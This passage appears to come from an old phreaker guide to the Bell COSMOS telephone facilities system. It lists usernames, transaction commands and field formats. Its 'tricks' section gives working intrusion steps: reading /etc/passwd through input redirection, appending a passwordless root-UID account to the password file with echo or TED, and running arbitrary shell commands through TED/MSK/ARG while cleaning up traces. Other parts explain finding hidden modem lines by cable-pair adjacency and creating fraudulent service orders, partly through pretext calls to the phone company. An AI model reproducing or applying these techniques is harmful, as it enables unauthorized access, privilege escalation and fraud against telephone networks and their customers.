happens on major BOC packet networks quite often. If you are
lucky enough to receive a 'WC#' prompt you have access to the
COSNIX shell, and can issue various unix-like commands, like
ls, cd, cat, et cetera.
COSMOS usernames are usually issued as two letters corresponding to
whatever center will be using that account, and two numbers.
EX: LA01
Using the above example "LA01" there will most probably be numerous
"LA" accounts, possibly "LA01" through "LA15" or higher. This is true
for most COSMOS usernames. More often than not, all accounts used by the
same center will have the same password as well. Some common usernames
and their owners are:
ROOT System Manager
SYS System Manager
ML Loop Assignment
LA Loop Assignment
DN Main Distributing Frame
IN Repair Service
RS Repair Service
CE LNAC
LK Account to execute INQuiries only
JA Mizar
WLI Work Load Indicator
Usernames may vary from BOC to BOC, but these are fairly standard.
=============================================================================
COSMOS TRANSACTION COMMANDS
COSMOS commands are three letter acronyms. I will explain in
depth the commands I have found most useful, and then list
the remainder. Remember, do not attempt to learn the formats for COSMOS
transactions online. You will probably not figure out correct inputs, and
will most likely cause problems for the system manager and yourself.
Commands are entered in a specific ways. The command desired is
entered at the WC% prompt. A second string of data is entered at
the next line which designates the type of transaction desired.
This line is prefixed with on of the following four letters:
H - Header Line
I - In Line
O - Out Line
R - Remark Line
The most commonly used line is the H line. It is a required input in
almost all COSMOS transactions. From the second line on, COSMOS will
prompt with an underscore "_" as the system prompt, to let the user
know that it is waiting for input. When all needed data has been entered,
the command is executed by typing a "." at the beginning of a new line.
If you wish to process a command, but stay in command level in order to
process further commands after the one you are currently entering has
finished, a ";" can be entered at the beginning of a new line.
To cancel the transaction you are entering, a "Q" should be entered at
the beginning of a new line. To interrupt output, the break character
is "^C". When entering criteria, you may enter all like data (all H-line, all
I-line, etc...) on one line using a "/" between input prefixes:
EX: H TN 222-0000,222-9999/RMKT SWBT?/US 1FB
is the same as entering:
H TN 222-0000,222-9999
_H RMKT SWBT?
_H US 1FB
One of the most commonly used commands is INQ (Complete
Circuit Inquiry). There is also a short form of INQ called
ISH. This command requires only the use of H lines. Multiple H lines
can be entered to narrow a search or to print multiple reports.
Valid H line facilities used are:
BL Bridge Lifter
CON Concentrator
CP Cable Pair
CKID Circuit ID
MR Message Register
OE Office Equipment Number
PL Private Line Circuit Number
TK Trunk Cable and Pair Number
TN Telephone Number
TP Tie Pair
XN "X" Number
TRE Transmission Equipment
TER Terminal Number
GP Group Number
ORD Work Order
EX: To print information on telephone number 222-2222
WC% INQ
H TN 222-2222
_.
EX: To print information on cable pair 11-1111
WC% INQ
H CP 11-1111
_.
INQ will print a full report whatever circuit you examine, while ISH
will print a shorter, easier to read report. Below is an actual ISH
done on a Telenet node.
CA% ISH
H TN 225-8004
_.
TN 225-8004
ST AU DATE 06-03-83 HT GP 0-0081 BTN 225-8004 TYPE X
OE 006-012-200
ST WK DATE 03-04-86 CS 1FBH US 1BH FEA TNNL
LCC TF2
LOC WF12003
TER 0-0081-0001
ST WK
RMKG GTE.TELENET
CP 95-0701
ST WK DATE 01-24-86 RZ 13
LOC WF12009
TP 6105-0910
ST WK DATE 01-24-86
LOC F12003
LOC F42001
FROM FAC OE 006-012-200 TO FAC TP 6206-0107
TP 6206-0107
ST WK DATE 01-24-86
LOC F22029
LOC F42002
HUNT SEQUENCE FOR TN 225-8004
TER 0001-0040
** ISH COMPLETED 02-29-99 12:00
CA%
When you pull an inquiry on a number that you are interested in, you will
be given its cable pair, its order number, any numbers that connect to
it through a hunt sequence, and you will see any remarks entered about the
number. This information can prove to be very valuable. For instance:
You suspect that a company has a modem online, yet you don't want to waste
time sequentially dialing thousands of numbers. You can simply enter
an ISH on the number to get its cable pair, then begin pulling ISH
reports on cable pairs close to the main one. Then you need only dial
twenty or so numbers that are in the same area as the main number, and
you will find the computer.
Another extremely valuable command is SIR (Sorting Inquiry by Range).
With SIR, you can print the circuit information on all lines that match
specified criteria within a specified range of numbers. This command
requires only H line input, but numerous lines may be entered in order to
narrow down the search. You may also use the wildcard character ("?") to
encompass a larger range when doing a SIR. There are many applications
for SIR, but I will only show examples on a few I have found to be
most useful.
Many times entries have special remarks entered about the circuit. These
are usually entered as RMKT (Remarks on Telephone Number), but they may be
entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable
Pair), depending upon what the person entering felt like typing.
Most of the time the remarks really don't correspond like they should.
Telephone companies are pretty thorough about remarking on a line that
they own and they will usually use the RMKT prefix.
EX: To find all telephone company (Southwestern Bell) lines in prefix 222
WC% SIR
H TN 222-0000,222-9999
_H RMKT SWBT?
_.
The "?" after SWBT acts as a wildcard. Typing SWB? would perform the same
search.
You may also want to search by STT (Telephone number status). Some types of
STT are:
AU Auxiliary
NP Non-published
OF Official (telco owned)
TS Test
Another way to distinguish types of number is by CS (Customer Class of
Service). CS values tend to vary from BOC to BOC, but business lines
will usually look like "1FB", or at least contain a "B". Residences
will usually look like "1FR." Sometimes telco lines are listed as "1OF",
but may also be entered as "1FB". On lines in a hunt group, the CS will
be appended with the letter "H", as "1FBH".
Let's say a company owns a block on an exchange (333) running from 1000 to
3500. You want to find all possible computer numbers in that area. Chances
are good that they are not listed.
EX:
WC% SIR
H TN 333-1000,333-3500
_H STT NP
_H CS 1FB
_.
The above would list all non-published business numbers from 333-1000
to 333-3500.
To find all numbers that are translated 800 numbers in the same prefix range
as above, you can do the following:
EX:
WC% SIR
H TN 333-1000,333-3500
_H PL ?800?
_.
This will prints reports on all private lines registered as 800 numbers.
There is also a shorter version of SIR, LTN (List Telephone Numbers), and a
more detailed version, GFR (General Facility Report), but I have found
SIR to be the better of the three to use for my purposes.
In order to change line attributes, or to create new lines you will need
to use two commands SOE (Service Order Entry), and RCP (Recent Change
Packager). These two commands are pretty detailed in what they can do,
so I will just cover a few of their options.
SOE will allow you to assign a new circuit, and specify the desired telephone
number, custom calling features, billing telephone number, etc.
SOE requires both "H" and "I" lines of input. The best way to enter
a new service order is to have COSMOS pick your new telephone number and
assign the needed office equipment number. If you want to pick your own
telephone number, the number you pick must have a status (STO) of SP, LI, RS,
or PD (with a disconnect date before the due date on your new service order).
This is so that you do not try to assign a number that is currently working
to your new service order. You can check this by doing an ISH on all the
variations of numbers you desire, and checking the STO. You can also get a
list of available numbers in a given prefix using the NAI command. You
should also do a SIR of recent entries, to try to find the proper format of
order numbers, so that you do not reuse one, or make one up that is formatted
incorrectly. Another method to make sure that you have the correct formatting
of order numbers is to call the phone company and request the installation of
a line in the area you are working in. They will tell you your service order
number for reference. Later, you can merely cancel the order. You will also
have to find a valid cable pair, so do an ISH on whatever number written in
your junction box that is not working, and then make sure there is no pending
connect orders entered on it.
To enter a service order for a new connection, having COSMOS pick an available
telephone number and assign proper office equipment numbers, you would do
the following:
EX:
WC% SOE
H ORD SO123456/OT NC/DD DD-MM-YY (Use valid Day, Month, Year for Due Date)
_I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY (Use valid cable pair for XX-YYYY)
_.
You would now need to enter RCP and make a correctly formatted recent change
report for the order you entered so RCMAC can pick up the order and directly
enter it into the switch. What RCP does is take your order and change it into
actual switch programming, using templates that are stored in directories
corresponding to what type of switching equipment is used for that WC.
(EX: ess5a)
EX: To create a recent change package for the order entered above
WC% RCP
H ORD SO123455
_.
Using SOE you can specify custom calling features, you can specify billing
telephone numbers, you can establish service as coin, and several other
options by adding "I" line information corresponding to that particular
option.
_I CCF XXXXXX (XXXXXX is valid custom calling features)
_I BTN NNX-XXXX (NNX-XXXX is valid billing TN)
_I TT C
To get a list of spare (available) telephone numbers in a given prefix, you
can use the NAI (Telephone Number Assignment Inquiry) command. You only need
enter H line criteria. In addition to searching by prefix (NNX), you can
search by switch type (TYP), or rate zone (RTZ).
EX: To select one spare telephone number in 555 and make it reserved status
WC% NAI
H TT X/NNX 555/STT RS
_.
You may also have NAI print out several available numbers, however, you cannot
change the status unless you are printing one listing.
EX:
WC% NAI
H TT X/NNX 555/LC XX (Where XX is a number between 1 and 25)
_.
To get a listing of all prefixes that exist in the Wire Center you are
logged in under, you can use the command DDS (Display DS Table). This
command will list the ranges that exist for a given input.
To list all telephone numbers in a given WC:
WC% DDS
H TN ?
_.
To list all cable pair ranges:
WC% DDS
H CP ?
_.
To change from one Wire Center to another, you use the command WCC (Wire
Center Change). This is a very straight forward command.
EX:
WC% WCC NW
NW%
To allow for redirection in your COSMOS commands, you must execute the
DIO command. This command is rather important for manipulating commands
to work for you.
EX:
WC% DIO
To see what transactions other people logged in are running, you can use the
command TSNAP (on certain generics)
EX:
WC% TSNAP
There are about one hundred other COSMOS commands that are all defined at the
end of this file. I cannot go into detail on all of them but I will list them
and their meanings.
=============================================================================
COSMOS TRICKS
Even if you don't have full COSNIX access, you can basically execute
any command or read any file that exists in the system. Using the INQ
(or ISH) command and redirection, you can open and display any file.
EX: To display the password file
WC% INQ </ETC/PASSWD
This will display the file, however, since this is a flaw in the command,
it thinks the file is to be input for INQ, and each line will be preceded
with "ILLEGAL LINE TYPE", but this can be ignored.
Other files to look at:
/USR/FACS/WCFILE List of all Wire Centers
/ETC/MATRIX.P Permission Matrix (Who can execute what commands)
You may or may not want to try the following. There is a high probability
that you will be noticed on the system. If your local COSMOS ports are
usually left logged in, don't bother doing this. However, if your COSMOS
ports are always logged out, and you almost never get in, and you happen
to stumble upon one left logged for the first time in months, it might be
worth a try.
There are a few ways to make a new account on COSMOS; however, you need to
be able to write to the password file. Some systems allow this, but most do
not.
The easiest way involves using the echo command and redirection.
EX:
WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd
This will add user EB01 to the end of the password file.
If you do not have access to echo you can do the same thing using the TED
command (Text Editor).
WC% TED >>/etc/passwd
S.O. NO.= SO123456
IS THIS A NEW S.O. (Y on NO) Y
1d
a
EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so
^C
1p
w
q
After executing the above, you will need to clean up the /etc/passwd
file to remove the Service Order information put in there by TED. You will
also need to remove the service order you created from the /usr/so/WC
directory.
If you cannot find a way to get shell access, you can still execute
any COSNIX command you desire again using TED, MSK (Output a Transaction
Mask), and ARG (Assemble and Run a Given Master File).
EX:
WC% TED
S.O. NO.= SO123456
IS THIS A NEW S.O. (Y or NO) Y
12
1d
a
$*
run!
^c
w
q
WC% MSK >/usr/so/newcmd
SO123456
WC% ARG
newcmd ls /etc
To execute the command, you need to do ARG, then the name of the
file (which I called newcmd), then the COSNIX command you wish to
execute.
If you can use echo this can be done much easier.
EX:
WC% echo '$*' >/usr/so/newcmd
WC% echo 'run!' >>/usr/so/newcmd
Then you can run your command normally with ARG.
WC% ARG
newcmd cd ..
IF you do not have access to echo, create a newcmd file and you can use it
that way.
WC% ARG
newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd
=============================================================================
COSMOS COMMAND LISTING
ACE Establish an Assignment Change Ticket
AIT ANALIT Initialization of Tables
ARG Assemble and Run a Given Master File
AUD Assignment List Audit
BAI Bridge Lifter Assignment Inquiry
BYF Display the Bypass File
BYP Change the Contents of the Bypass File
CAY Create an Assembly
CCA Change Customer Attributes
CCT Initialize and Update the Contractor-Transducer File
CDA Change Distribution Attributes
CDD Change Due Date
CDR Cut Thru DIP Report
CFA Change Facility Attributes
CFP Print the Class of Service/Features for an Electromechanical Entity
CFU Change Facility Usage
CIE Company Establish Company Initiated Change
CLI COSMOS Processed ALIT Reports
CPI COSMOS-PREMIS Interface
CPM COSMOS Performance Monitor
CTC Complete a Cable Transfer or Complete a Cable Throw
CTE Cable Throw Order Establishment
CTF Display the Contacter-Transducer File
CTL Cable Throw with Line Equipment Assignment
CTM Cable Throw Modification
CTP Print Cable Transfer Frame Work
CTR Cable Throw Replacement
CTS Cable Throw Summary
CTW Withdraw a Cable Transfer or a Cable Throw
CUP Common Update Processor
CXC Complex Service Order Input Checker
CXM Centrex Table Management
CXT Complex Order Inquiry for NAC Review
DAY Delete an Assembly
DBL Data Base Load
DCN List Disconnected and Changed Numbers
DDS Display the DS Table
DIR Standard DIP Report
DPN DIP Purge Number
DPR DIP Report and Removal
DQR Design Quota System Report
DQS Design Quota System
DTE Print Current Date
EDZ Facility Emergency Assignment List
ELA Entity Load Analysis
ESP Print Entire Summary Table
FDY Set Fiscal Day for LAC
FLR Frame Layout Report
FOR Frame Order Report
FOS Frame Operations Summary
FTA Frame Transfer Analysis
FTC Frame Transfer Completion
FTE Frame Transfer Establishment
FTL Frame Transfer LETs
FTR Frame Transfer Reprint
FTW Frame Transfer Withdrawal
FWM Frame Work Management
GFR General Facility Report
GLA Generate Lists for Assignment
HBS Hunt Group Blocks of Spares
HGR Hunt Group Report
HGS Hunt Group Summary
HIS Hunting ISH
IJR Input a Jeopardy Reason
IMU Input Measured CCS Usage Data
INQ Complete Circuit Inquiry
ISF Inquire on a Single Facility
ISH Complete Circuit Inquiry Short
JAM Jumper Activity Management
JPH Jumper Placement History
KPR Killer Pair Report
KSM Create a Transaction Mask
LAI Line Equipment Assignment Inquiry
LBP Load Balance Parameters
LCD LIST Cable Summary, LIT Demand Test
LCP List Cable Pairs
LEE NAC Related Line Equipment Transfer Order Establishment
LEW Line Equipment Transfer Withdrawal
LFC Load Factor Calculation
LFR Line Failure Report
LGN List Hunt Groups
LIN Transmit ALIT Data to COSMOS
LOE List Originating Line Equipment
LSE Line and Station Transfer Order Establishment
LSW Line and Station transfer Withdrawal
LTN List Telephone Numbers
MAL Manual Assignment List
MAP Manual Assignment Parameters
MAQ Manual Assignment File Inquiry
MAY Modify an Assembly
MCE Establish a Maintenance Change Ticket
MCH Manually Change Hunt
MCL Maintenance Change List
MCR Establish a Maintenance Change Repair
MCW Maintenance Change Ticket Withdrawal
MDC Manually Disconnect a Working Circuit
MEC Manually Establish a Circuit
MMC Manually Modify a Circuit
MOC MOE Order Completion
MOE Mass OE Transfers
MOF Mass OE Frame Transfer Listings
MOW MOE Order Withdrawal
MPK Modify Work Package
MSK Output a Transaction Mask
MTR Manually Test a Response
NAI Telephone Number Assignment Inquiry
NOL NAC Service Order Listing
NSD Number Summary Display
OIJ Orders in Jeopardy
OPN Open-of-Day Report
OPU Outside Plant Cable Usage
PAK Work Packages
PEP Position Establishment for Parties
PFR Party Line Fill Report
PRP Periodic Purging of Remarks
QEX Question an Execution
QUE Queue
RAL Relay Assignment List
RAP Relay Assignment Parameters
RAS Release Sequence Number Lists and Related TN/OE
RBS Print TBS Relays Assignment Record
RCP Recent Change Packager
RCR Recent Change Report
RCS Recent Change Summary
RED Recent Change Message Text Editor
REL Release Non-Intercepted Numbers by Release Date
REM Remove Frame Locations
RET Retermination of Frame Locations
REX Reexecute a Service Order
RJR Remove Jeopardy Reason Codes
RMP Recent Change Punctuation Table
RNA Release Telephone Numbers for Assignment
ROE Reservation Order Establishment
ROI Reservation Order Inquiry
ROW Reservation Order Withdrawal
RTH Report Transaction to Count Spare and DIPed Line Equipment
RTS Relay and Telephone Number Status Report
RUP Request Unsolicited Processing
SAI Summary of Action Items
SCA Service Order Completion-Automatic
SCF Simple Completion for MDF
SCI Spare Cable Pair Inquiry
SCM Standard Completion by MDF
SCP Service Order Completion by LAC
SCR Standard Completion by RCMAC
SEL Selecting Lines for an Exchange Class of Service Study
SET Statistics on Equipment and Telephone Numbers
SGH Supply Relays for Groups of 5XB Hunts
SIR Sorting Inquiry by Range
SLC Subscriber Line Counts for Custom Calling Features
SOC Service Order Cancel
SOE Service Order Establishment
SOF Service Order Fix
SOH Service Order Withheld
SOI Service Order Assignment Inquiry
SOL Service Order Listing
SOM Modify a Pending Service Order
SOW Service Order Withdrawal
STN Summarize Telephone Numbers
SVL Service Observing Loops
TAI Tie Pair Assignment Inquiry
TAT Test Alignment of Frame Terminal
TED Text Editor
TET Display or Change Band Filter File, Retention Factor and Print Threshold
TFC Transfer Frame Changes
TIG Dial Transfer Input Generator
TLC Translate LANAVAR/CPS
TNS Telephone Number Swap
TOC Transfer Order Completion
TOE Transfer Order Establishment
TOF Mass OE Transfer Order Frame Listings
TOI Dial Transfer Order Inquiry
TOL Transfer Order Lists
TOO Transfer Order Omissions
TOW Transfer Order Withdrawal
TPU Tie Pair Usage Report
TRC Transfer Order Recent Change Report
TRI Transmission Equipment Assignment Inquiry
TRW Total Reservation Order Withdrawal
TSL Line Equipment Summary Report
TSN Traffic Statistics on Telephone Numbers
TSW Total Service Order Withdrawal
TTY Get TTY Name
TXC Text Checker
TXM Transfer Centrex Management
UDP Update DIP Parameters
UES Update the Entity Summary Table
UFO Unprinted Frame Orders
UPC Update CCS vs. Class of Service Table
USL List USOC (US) File Data
UTC Update Table for Concentrator Redesign
WCC Change Wire Center
WCT Worksheet for Cable Throw Orders
WFL Working Frame Location
WOI Work Order Inquiry
WOL Work Order Listing
WPT Work Package Table
WSL Work Status List
WUL Work Unit Report for Subscriber Line Testing and Installation Assignment
=============================================================================
COSMOS ABBREVIATIONS AND FORMATS
The following will be given as follows:
Prefix and Meaning
Format
Code Value and Meaning
AC Assembly category
AC XXXX
PERM=Permanent Facility Assemblies
TEMP=Temporary Facility Assemblies
AC Assembly Code
AC XXX
XXX=1-999
ADSR Administration of Designed Services Review
ADSR X
Y=Yes, TIRKS Circuit
N=No, COSMOS Circuit
AGM Normal Aging Months
AGM XX
XX=Number of Months
AGT Accelerated Aging Type
AGT XXX
BUS=Business
RES=Residential
AI Assigner's Initials
AI XXX
XXX=3 Alphanumeric Characters
AO Allocation Order
AO XX
XX=Two Numeric Characters
AR Advance Relay
AR XYY-ZZZ
X=Marker Group
YY=Number Group from Frame
ZZZ=Relay Number
ATN Assigner's Telephone Number
ATN XXX-XXXX
XXX-XXXX=Assigners TN
BL Bridge Lifter
BL XX...XX
XX...XX=Maximum of 17 Alphanumeric Characters
BLS Bridge Lifter Status
BLS X
Y=Yes
N=No
BND Band Number
BND X
X=0-3
BTN Billing Telephone Number
BTN XXX-XXXX
XXX-XXXX=Billing Telephone Number
CA Cable Number
CA XX...XX
XX...XX=Maximum of 10 Alphanumeric Characters
CAT Centrex Access Treatment
CAT XX
XX=Maximum of 2 Numeric Characters
CC Call Count
CC XX
XX=Maximum of 2 Numeric Characters
CCF Custom Calling Features
CCF XXXXXX
XXXXXX=3 to 6 Alphanumeric Characters
CCS Hundred Call Seconds
CCS XXXX
XXXX=3 or 4 Numeric Characters
CEU CCS Estimated Usage
CEU XXXX
XXXX=3 or 4 Numeric Characters
CG Control Group Number
CG X
X=0-9
CKID Circuit Identification
CKID XX...XX
XX..XX=Maximum of 61 Alphanumeric Characters
CKL Circuit Location
CKL XXXX
XXXX=Maximum of 4 Alphanumeric Characters
CLC Common Language Code for an Entity
CLC XX...XX
XX...XX=Maximum of 11 Alphanumeric Characters
CLCI Common Language Circuit Identification
CLCI XX...XX
XX...XX=Maximum of 61 Alphanumeric Characters
CLEI Common Language Equipment Identifier
CLEI XX...XX
XX...XX=Maximum of 10 Alphanumeric Characters
CLF Creating DIPs Upper Bound Load Factor
CLF XX
XX=1-10
CLL Creating DIPs Lower Bound Load Factor
CLF X
X=1-9
CLS CLCI in Serial Number Format
CLS XX...XX
XX..XX=Maximum of 61 Alphanumeric Characters
CLT CLCI Telephone Number Format
CLT XX...XX
XX...XX=Maximum of 61 Alphanumeric Characters
CMF Capacity Main Station Fill
CMF XXXXXX
XXXXXX=Maximum of 6 Numeric Characters
CMU CCS Measured Usage
CMU XXXX
XXXX=3 or 4 Numeric Characters
COM Complement Size
COM XXXX
XXXX=1-9999
CON Concentrator
CON XX-YY
XX=Maximum of 2 Alphanumeric Characters
YY=Maximum of 2 Numeric Characters
CP Cable and Pair Number
CP XX...XX-YZZZ
XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters
YZZZ=Cable Pair ID
Y=Alphanumeric
ZZZ=Numeric
CPU CCS Capacity Usage
CPU XXXX
XXXX=3 or 4 Numeric Characters
CRG CREG Tag
CRG XXX
XXX=YES or NO
CS Customer Class of Service
CS XXXXXX
XXXXXX=Maximum of 6 Alphanumeric Characters
CTID Circuit Termination Identification
CTID XX...XX
XX...XX=Maximum of 61 Alphanumeric Characters
CTT Cut Through Tag
CTT XXX
XXX=YES or NO
CTX Centrex Group Number
CTX XXXX
XXXX=Maximum of 4 numeric Characters
DC Dial Code
DC X
X=1 Alpha Characters
DD Due Date
DD MM-DD-YY
MM=Month
DD=Day
YY=Year
DID Direct Inward Dialing
DID XXXX
XXXX=Maximum of 4 Numeric Characters
DIP DIP Creation Option
DIP X
Y=Yes
N=No
DNY Denial of Service for Non-payments
DNY X
I=Incoming
O=Outgoing
B=Both
DPA Different Premises Address
DPA XXX
XXX=Maximum of 3 Alphanumeric Characters
DPT Department Name
DPT XXX
XXX=Maximum of 3 Alphanumeric Characters
DST Destination of Order Response
DST XXXX
XXXX=Maximum of 4 Alphanumeric Characters
DT Due Time
DT XX
XX=AM, PM, or 0-9
EC ESS Entity and Control Group Number
EC YZ
Y=Entity Number
Z=Control Group Identifier
ECS Equipment Class of Service
ECS XXXXXX
XXXXXX=Maximum of 6 Alphanumeric Characters
ED Enter Date
ED MM-DD-YY
MM=Month
DD=Day
YY=Year
EN Entity
EN X
X=S, E, 1, 5 or 0
EN Entity Number
EN X
X=0-9
ENT Entity Number
ENT X
X=0-9
EO Error Handling Option
EO XX
CE=Continue Processing and Establish Valid Circuits
CW=Continue Processing and Withdraw Established Circuits
SE=Stop Processing and Establish Valid Circuits
SW=Stop Processing and Withdraw Established Circuits
EQF Equipment Features
EQF WXYZ
W=R (Rotary) or T (Touchtone)
Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension)
X=E (Essential) or N (Non-essential)
Z=G (Ground Start) or L (Loop Start)
EQV Frame Equivalence
EQV FXX
F=The Letter "F"
XX=Two Alphanumeric Characters
ETC Estimated Trunk CCS Value
ETC XXXX
XXXX=Maximum of 4 Alphanumeric Characters
EXD ECS Crossloading Option
EXD XXX
XXX=YES or NO
FAC Type of Segment List Being Audited
FAC XX
TN=Telephone Number
OE=Line Equipment
FAC Circuit Confiruration
FAC XXX or
FAC TN-NNX or
FAC CP-XX...X or
FAC SE-YY...Y or
FAC PL-ZZ...Z
XXX=Any Facility Prefix
NNX=Three Alphanumeric Characters
XX...XX=Maximum of 10 Alphanumeric Characters
YY...YY=Maximum of 52 Alphanumeric Characters
ZZ...ZZ=Maximum of 61 Alphanumeric Characters
FC From Cable
FC XX...XX
XX...XX=Maximum of 10 Alphanumeric Characters
FDD Frame Due Date
FDD MM-DD-YY
MM=Month
DD=Day
YY=Year
FEA Customer Feature
FEA XXXX
(Same as EQF)
FILT Filter
FILT XXX
XXX=Y, YES, N, or NO
FR Frame Identification
FR FXX
F=The letter "F"
XX=Two Alphanumeric Characters
FT Frame Time
FT XX
XX=01-24
FW MDF Output Suppressed
FW X
Y=Frame Work Yes
N=Frame Work No
GP MLHG Group Number
GP Y-XXXX
Y=Alphanumeric Control Group
XXXX=Numeric Group Number
GSO Ground Start Option
GSO X
1=Assigned to any OE in the Entity
2=Assigned to Even Levels
3=Only Assigned to OE Specified as Ground Start
HC Hunt Count
HC XXXX
XXXX=Maximum of 4 Numeric Characters
HF Hunt-from Telephone Number
HF XXX-XXXX
XXX-XXXX=Telephone Number
HLC Highest Lead Factor Group Count
HLC XXXX
XXXX=1-9999
HR Held Order Reason Code
HR XX
CE=Equipment Shortage
CF=Lack of Facility
CL=Plant Load
CO=General Company Reasons
C1-C5-Additional Company Reasons
SA=Subscriber Access
SL=Subscriber Requested Later Date
SO=General Subscriber Reasons
SR=Subscriber Not Ready
S1-S5=Additional General Subscriber Reasons
HRS Hours Prefix
HRS XX
XX=01-24
HT Hunt-to Telephone Number
HT XXX-XXXX
XXX-XXXX=Telephone Number
HTG Hunt-to Group Number
HTG Y-XXXX
Y=Alphanumeric Control Group
XXXX=Numeric Group Number
HTX Hunt-to X Number
HTX XXX-YYXX of
HTX XXX-YXX
Y=Alphanumeric
X=Numeric
INIT Allocation Table Initalization
INIT
(No Data Entry)
ITM Cable Pair Item Number
ITM XX
XX=Two Numeric Characters
JL Jumper Length
JL XXX
XXX=Maximum of 3 Numeric Characters
JR Jeopardy Reason
JR XX
A1=Assignment Error on CP
A2=Assignment Error on OE
A3=Assignment Error on TN
A4-A9=Other Assignment Error
C1=No SSWO for Circuit Design Group
C2-C9=Local Code for Circuit Design Group
E1-E9=No ESS Translations
IB=No Installation Go-ahead for Business
IC=No Installation Go-ahead for Coin
ID=No Installation Go-ahead for Data
IR=No Installation Go-ahead for Residence
IS-No Installation Go-ahead for Special
I1-I4=Local Codes foir No Installation Go-ahead
RB=Business RSB
RC=Coin RSB
RD=Data RSB
RR=Residence RSB
RS=Special RSB
R1-R4=Local Use for RSB
LC Output Line Count
LC XXXX
XXXX=0-9999
LC Line Count
LC XXX
XXX=0-999
LC Pending Service Order Count
LC
(No Data Entry)
LCC Line Class Code
LCC XXX
XXX Maximum of 3 Alphanumeric Characters
LD Loading Division
LD XX
XX=Two Numeric Characters
LDN Listed Directory Number
LDN XXX-XXXX
XXX-XXXX=Telephone Number
LF Load Factor
LF XX
XX=1-10
LIM Less Than the Specified Number of Pairs
LIM XX
XX=0-50
LIM High Limit on Number of Specified Status Pairs in a Complement
LIM XX
XX=0-50
LIM Low Limit on Number of Spare Line Equipment in Vertical Files
LIM XX
LIM=1-10
LLC Low Load Group Count
LLC XXXX
XXXX=0-9999
LOC Location
LOC FXXYYY
F=The Letter "F"
XX=Alphanumeric
YYY=001-999
LP Loop Range
LP XXX;XXX
XXX;XXX=Six Numeric Characters
LS List New Pending Cable Transfers
LS XXX
XXX=NEW
LTI Loop Termination Identifier
LTI XXX
XXX=Three Alphanumeric Characters
MASK Office Equipment Mask
MASK OE ID
ID=XXX-XXX-XXX =1ESS
ID=XXX-XXXX =2ESS
ID=XXX-XXXX =3ESS
ID=XXXX-XXX-XX =5ESS
ID=XXXX-XX-XX =5ESS
ID=XXXX-X-XXXX =RSS
ID=XXXX-XXX-XX =1XB
ID=XXXX-XXXX-XX =1XB
ID=XXX-XX-XX =5XB
ID=XXXX-XXX =SXS
ID=XXX-X-XX-X =DMS-10
ID=XXX-X-XX-XX -DMS-100
X=Alphanumeric
MAT Manual Assistance Tag
MAT XXX
XXX=YES or NO
MAX Maximum Percentage Value of Entity Fill or Maximum CCS Value
MAX XXX
XXX=Maximum of 3 Numeric Characters
MBL Mini-bridge Lifter Tag
MBL XX
Y=MBL Working on CP
N=CP Can't Support MBL
EQ=CP has MBL Capabilities
MC Marker Class of Service
MC XX
XX=Two Alphanumeric Characters
MF Recent Change Message Format
MF XXXX
NEW=RX:LINE:messages
OUT=RC:LINE:OUT:messages
CHG=RC:LINE:CHG:messages
SUSP=RC:LINE:CHG:messages of suspended service
MF Jumper Listing for MDF
MF XXX
NEW=Running Jumper Listing
DJ=Dead Jumper Listing
MF Message Format When Completing Transfer Circuits with TOC
MF XXX
ALL=Message is Printed for Every Circuit in Range
ERR=Message Printed Only for Circuits not Completed
MF Message Format for Dial Transfer Number Lists
MF XXX
GVR=Transaction GFR Output Format, One Facility per Line
LVT=Line Verification Test Format
TLC=Two-line Condensed Format
MG Marker Group Number
MG X
X=0-9
MIN Minimum Percentage Value of Entity Fill or Minimum CCS Value
MIN XXX
XXX=Maximum of 3 Numeric Characters
MLP Multi-loop Resistance Zone Threshold
MLP XX
XX=Two Numeric Characters
MOD Module Number
MOD XXX
XXX=Three Numeric Characters
MODE Integrated SLC No. 5ESS Mode
MODE X
1=5 T1 Carrier Channels
2=3 T1 Carrier Channels
MPN Master Work Package Number
MPN XXXX
XXXX=1-9999
MR Message Register
MR XXXXXX
XXXXXX=Maximum of 6 Alphanumeric Characters
MRO Message Register Option
MRO XXX
XXX=YES or NO
MT Master Record Tape Unit Number or Tape Drive to Write
MT X
X=Numeric
MTR Tape Drive to Read
MTR X
X=Numeric
MTW Tape Drive to Write
MTW X
X=Numeric
NAR NAC Assignment Review
NAR XXX
XXX=Maximum of 3 Numeric Characters
NGF Number Group Frame for 5XB
NGF XXX
XXX=Three Numeric Characters
NNX Telephone Exchange Code
NNX XXX
XXX=THree Numeric Characters
NOE Number of OEs to be Assigned
NOE X
X=0 or 1
NPA Area Code and Exchange Number
NPA XXXXXX
XXXXXX=Six Alphanumeric Characters
NRM Normalizing CCS VAlue
NRM XX
XX=0-99
NTN Number of TNs to be Assigned
NTN X
X=0 or 1
OA Line Equipment Assignment Option
OA X
Y=Yes
N=No
OC Order Category
OC XXX
ACT=Assignment Change Ticket
ALL=All OE Load Factors
CPC=Special Service
FM=Count Since OE Input Features Occurrences
FO=Count All OE Input Feature Occurrences
HOT=Frame Ouput-urgent
JR=Jeopardy Reason
OCS Old Class of Service
OCS XXXXXX
XXXXXX=Maximum of 6 Alphanumeric Characters
OD Output Device
OD XXXX
TT=Send Output to Current Terminal
TTXX=Send Output to Specified Terminal XX
MTX=Send Output to Magnetic Tape X
OE Office Equpiment Number
OE ID
(See MASK)
OGO Outgoing Only Trunk
OGO XXX
XXX=Maximum of 4 Numeric Characters
OPT Party Assignment Option
OPT X
1=Assign Multi-party Customers to Spare Party Equipment
2=Assign Multi-party Customer to Partially Equipped Party Equipment
3=Assign Only One Multi-Party Customer to each Single Party Equipment
ORD Service or Work Order
ORD XX...XX
XX...XX=Maximum of 20 Alphanumeric Characters
OT Service or Work Order Type
OT XXX
BT=Background Transfer
CD=Complete Disconnect
CH=Changed
CIO=Company Initiated Orders
F="FROM"
LET=Line Equipment Transfers
LST=Line and Station Transfers
MCE=Maintenance Change by LAC
MCR=Maintenance Change by Repair
MCT=All Maintenance Changes
NC=New Connect
R=Remarks
REA=Pending Reassociation
SW=Swap
T="TO"
PBX Private Branch Exchange
PBX XXXX
XXXX=Maximum of 4 Numeric Characters
PCID Primary Circuit Identification
PCID XX...XX
